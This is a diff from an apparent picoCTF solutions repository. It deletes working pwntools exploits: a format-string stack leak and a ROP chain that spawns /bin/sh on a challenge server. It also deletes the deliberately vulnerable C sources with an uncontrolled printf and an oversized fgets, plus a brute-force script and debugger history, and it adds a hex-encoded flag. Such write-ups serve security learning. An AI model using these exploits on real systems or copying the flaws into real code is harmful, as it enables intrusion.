View File

@@ -1,29 +0,0 @@
#!/usr/bin/env python
from pwn import *
buffer_size = 127
hex_to_read = 127//2
hex_reader = b'%x'*hex_to_read
payload = hex_reader + b'.'
log.info(f"payload: {payload}")
def endian_swap(s, offset=0):
result = b''
for i in range(3+offset, len(s), 4):
result += bytes(reversed(s[i-3:i+1]))
return result
conn = remote("saturn.picoctf.net", 65206)
conn.recvuntil(b" >> ")
conn.sendline(payload)
conn.recvline()
data = conn.recvline(keepends=False)[:-1]
log.info(f"received data: {data}")
unhexed_data = unhex(data)
for i in range(4):
endian_swapped_data = endian_swap(unhexed_data, offset=i)
if b"picoCTF" in endian_swapped_data:
break
log.info(f"processed data: {endian_swapped_data}")

BIN
flag_leak/vuln
View File

Binary file not shown.

46
flag_leak/vuln.c
View File

@@ -1,46 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>
#define BUFSIZE 64
#define FLAGSIZE 64
void readflag(char* buf, size_t len) {
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,len,f); // size bound read
}
void vuln(){
char flag[BUFSIZE];
char story[128];
readflag(flag, FLAGSIZE);
printf("Tell me a story and then I'll tell you one >> ");
scanf("%127s", story);
printf("Here's a story - \n");
printf(story);
printf("\n");
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
return 0;
}

60
guessing_game_1/.gdb_history
View File

@@ -1,60 +0,0 @@
disassemble main
disassemble increment
disassemble get_random
exit
cyclic
cyclic 100
cyclic 200
cyclic 360
cyclic zaaa
cyclic zaaaaa
cyclic help
cyclic -l bdaaaaaa
cyclic -l aaaaaa
cyclic -l aaaaaaaa
cyclic -l aaaaaaab
r
r
cyclic -l 0x6161616161616170
disassemble main
exit
c
c
c
c
c
c
c
c
disassemble win
b *win+49
c
exit
b *win+49
c
stackf
stackf help
stackf -h
stackf 100
hexdump $sp 200
nexti
stackf
nexti
c
hexdump *bss
vmmap
hexdump 0x6b7000
hexdump 0x6bd000
hexdump 7062432
nexti
b *win+49
c
nexti
hexdump 7062432
c
nexti
c
b *win+49
c
c
nexti

5
guessing_game_1/Makefile.share
View File

@@ -1,5 +0,0 @@
all:
gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c
clean:
rm vuln

28
guessing_game_1/get_random_numbers.py
View File

@@ -1,28 +0,0 @@
#!/usr/bin/env python
from pwn import *
n = 6
values = []
p = log.progress(f"bruteforcing {n} random numbers")
while len(values) < n:
for i in range(100):
with context.quiet:
conn = process("./vuln")
conn.recvline()
for v in values:
conn.recvuntil(b"guess?")
conn.sendline(str(v).encode())
conn.sendline(b"0")
p.status(f"i = {i:03}, {values}...")
conn.recvuntil(b"guess?")
conn.sendline(str(i+1).encode())
conn.recvline()
result = conn.recvline()
with context.quiet:
conn.close()
if b"win" in result:
values.append(i+1)
break
p.success(f"values are {values}")

58
guessing_game_1/sol.py
View File

@@ -1,58 +0,0 @@
#!/usr/bin/env python
from pwn import *
# https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
context.terminal = "kitty"
numbers = [84, 87, 78, 16, 94, 36] # -> brute-forcing script
elf = ELF("./vuln")
rop = ROP(elf)
pop_rdi = rop.rdi.address
pop_rsi = rop.rsi.address
pop_rdx = rop.rdx.address
pop_rax = rop.rax.address
syscall = rop.syscall.address
bss = elf.bss()
read = elf.functions['read'].address
main = elf.functions['main'].address
ret_offset = 120
conn = remote("shape-facility.picoctf.net", 50780)
#conn = process("./vuln")
#attach(conn)
conn.recvuntil(b"guess?")
conn.sendline(str(numbers[0]).encode())
conn.recvuntil(b"Name?")
# call read: read(int fd -> rdi, void buf[count] -> rsi, size_t count -> rdx)
# read(stdin/0, bss, 12)
log.info(f"sending read payload")
payload = cyclic(ret_offset, n=8)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(bss)
payload += p64(pop_rdx) + p64(12)
payload += p64(read)
payload += p64(main)
conn.sendline(payload)
conn.sendline(b"/bin/sh\x00")
conn.recvuntil(b"guess?")
conn.sendline(str(numbers[1]).encode())
conn.recvuntil(b"Name?")
# call /bin/sh: sys_execve(59), rdi: char *filename, rsi: char *argv, rdx: char *envp
# sys_execve(bss, NULL/0, NULL/0)
log.info(f"calling execve")
payload = cyclic(ret_offset, n=8)
payload += p64(pop_rax) + p64(59)
payload += p64(pop_rdi) + p64(bss)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)
conn.sendline(payload)
conn.recvline()
conn.interactive()

BIN
guessing_game_1/vuln
View File

Binary file not shown.

67
guessing_game_1/vuln.c
View File

@@ -1,67 +0,0 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#define BUFSIZE 100
long increment(long in) {
return in + 1;
}
long get_random() {
return rand() % BUFSIZE;
}
int do_stuff() {
long ans = get_random();
ans = increment(ans);
int res = 0;
printf("What number would you like to guess?\n");
char guess[BUFSIZE];
fgets(guess, BUFSIZE, stdin);
long g = atol(guess);
if (!g) {
printf("That's not a valid number!\n");
} else {
if (g == ans) {
printf("Congrats! You win! Your prize is this print statement!\n\n");
res = 1;
} else {
printf("Nope!\n\n");
}
}
return res;
}
void win() {
char winner[BUFSIZE];
printf("New winner!\nName? ");
fgets(winner, 360, stdin);
printf("Congrats %s\n\n", winner);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
int res;
printf("Welcome to my guessing game!\n\n");
while (1) {
res = do_stuff();
if (res) {
win();
}
}
return 0;
}

1
mob_psycho/flag.txt Normal file
View File

@@ -0,0 +1 @@
7069636f4354467b6178386d433052553676655f4e5838356c346178386d436c5f35653637656135657d

BIN
mob_psycho/mobpsycho.apk Normal file
View File

Binary file not shown.

BIN
mob_psycho/mobpsycho/AndroidManifest.xml Normal file
View File

Binary file not shown.

1
mob_psycho/mobpsycho/META-INF/androidx.activity_activity.version Normal file
View File

@@ -0,0 +1 @@
1.6.0

1
mob_psycho/mobpsycho/META-INF/androidx.annotation_annotation-experimental.version Normal file
View File

@@ -0,0 +1 @@
1.3.0

1
mob_psycho/mobpsycho/META-INF/androidx.appcompat_appcompat-resources.version Normal file
View File

@@ -0,0 +1 @@
1.6.1

1
mob_psycho/mobpsycho/META-INF/androidx.appcompat_appcompat.version Normal file
View File

@@ -0,0 +1 @@
1.6.1

1
mob_psycho/mobpsycho/META-INF/androidx.arch.core_core-runtime.version Normal file
View File

@@ -0,0 +1 @@
2.1.0

1
mob_psycho/mobpsycho/META-INF/androidx.cardview_cardview.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.coordinatorlayout_coordinatorlayout.version Normal file
View File

@@ -0,0 +1 @@
1.1.0

1
mob_psycho/mobpsycho/META-INF/androidx.core_core-ktx.version Normal file
View File

@@ -0,0 +1 @@
1.9.0

1
mob_psycho/mobpsycho/META-INF/androidx.core_core.version Normal file
View File

@@ -0,0 +1 @@
1.9.0

1
mob_psycho/mobpsycho/META-INF/androidx.cursoradapter_cursoradapter.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.customview_customview.version Normal file
View File

@@ -0,0 +1 @@
1.1.0

1
mob_psycho/mobpsycho/META-INF/androidx.documentfile_documentfile.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.drawerlayout_drawerlayout.version Normal file
View File

@@ -0,0 +1 @@
1.1.1

1
mob_psycho/mobpsycho/META-INF/androidx.dynamicanimation_dynamicanimation.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.emoji2_emoji2-views-helper.version Normal file
View File

@@ -0,0 +1 @@
1.2.0

1
mob_psycho/mobpsycho/META-INF/androidx.emoji2_emoji2.version Normal file
View File

@@ -0,0 +1 @@
1.2.0

1
mob_psycho/mobpsycho/META-INF/androidx.fragment_fragment.version Normal file
View File

@@ -0,0 +1 @@
1.3.6

1
mob_psycho/mobpsycho/META-INF/androidx.interpolator_interpolator.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.legacy_legacy-support-core-utils.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-livedata-core.version Normal file
View File

@@ -0,0 +1 @@
2.5.1

1
mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-livedata.version Normal file
View File

@@ -0,0 +1 @@
2.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-process.version Normal file
View File

@@ -0,0 +1 @@
2.4.1

1
mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-runtime.version Normal file
View File

@@ -0,0 +1 @@
2.5.1

1
mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-viewmodel-savedstate.version Normal file
View File

@@ -0,0 +1 @@
2.5.1

1
mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-viewmodel.version Normal file
View File

@@ -0,0 +1 @@
2.5.1

1
mob_psycho/mobpsycho/META-INF/androidx.loader_loader.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.localbroadcastmanager_localbroadcastmanager.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.print_print.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.recyclerview_recyclerview.version Normal file
View File

@@ -0,0 +1 @@
1.1.0

1
mob_psycho/mobpsycho/META-INF/androidx.savedstate_savedstate.version Normal file
View File

@@ -0,0 +1 @@
1.2.0

1
mob_psycho/mobpsycho/META-INF/androidx.startup_startup-runtime.version Normal file
View File

@@ -0,0 +1 @@
1.1.1

1
mob_psycho/mobpsycho/META-INF/androidx.tracing_tracing.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.transition_transition.version Normal file
View File

@@ -0,0 +1 @@
1.2.0

1
mob_psycho/mobpsycho/META-INF/androidx.vectordrawable_vectordrawable-animated.version Normal file
View File

@@ -0,0 +1 @@
1.1.0

1
mob_psycho/mobpsycho/META-INF/androidx.vectordrawable_vectordrawable.version Normal file
View File

@@ -0,0 +1 @@
1.1.0

1
mob_psycho/mobpsycho/META-INF/androidx.versionedparcelable_versionedparcelable.version Normal file
View File

@@ -0,0 +1 @@
1.1.1

1
mob_psycho/mobpsycho/META-INF/androidx.viewpager2_viewpager2.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/androidx.viewpager_viewpager.version Normal file
View File

@@ -0,0 +1 @@
1.0.0

1
mob_psycho/mobpsycho/META-INF/com.google.android.material_material.version Normal file
View File

@@ -0,0 +1 @@
1.5.0

2
mob_psycho/mobpsycho/META-INF/com/android/build/gradle/app-metadata.properties Normal file
View File

@@ -0,0 +1,2 @@
appMetadataVersion=1.1
androidGradlePluginVersion=8.0.2

1
mob_psycho/mobpsycho/META-INF/kotlinx_coroutines_android.version Normal file
View File

@@ -0,0 +1 @@
1.6.1

1
mob_psycho/mobpsycho/META-INF/kotlinx_coroutines_core.version Normal file
View File

@@ -0,0 +1 @@
1.6.1

1
mob_psycho/mobpsycho/META-INF/services/kotlinx.coroutines.CoroutineExceptionHandler Normal file
View File

@@ -0,0 +1 @@
kotlinx.coroutines.android.AndroidExceptionPreHandler

Some files were not shown because too many files have changed in this diff Show More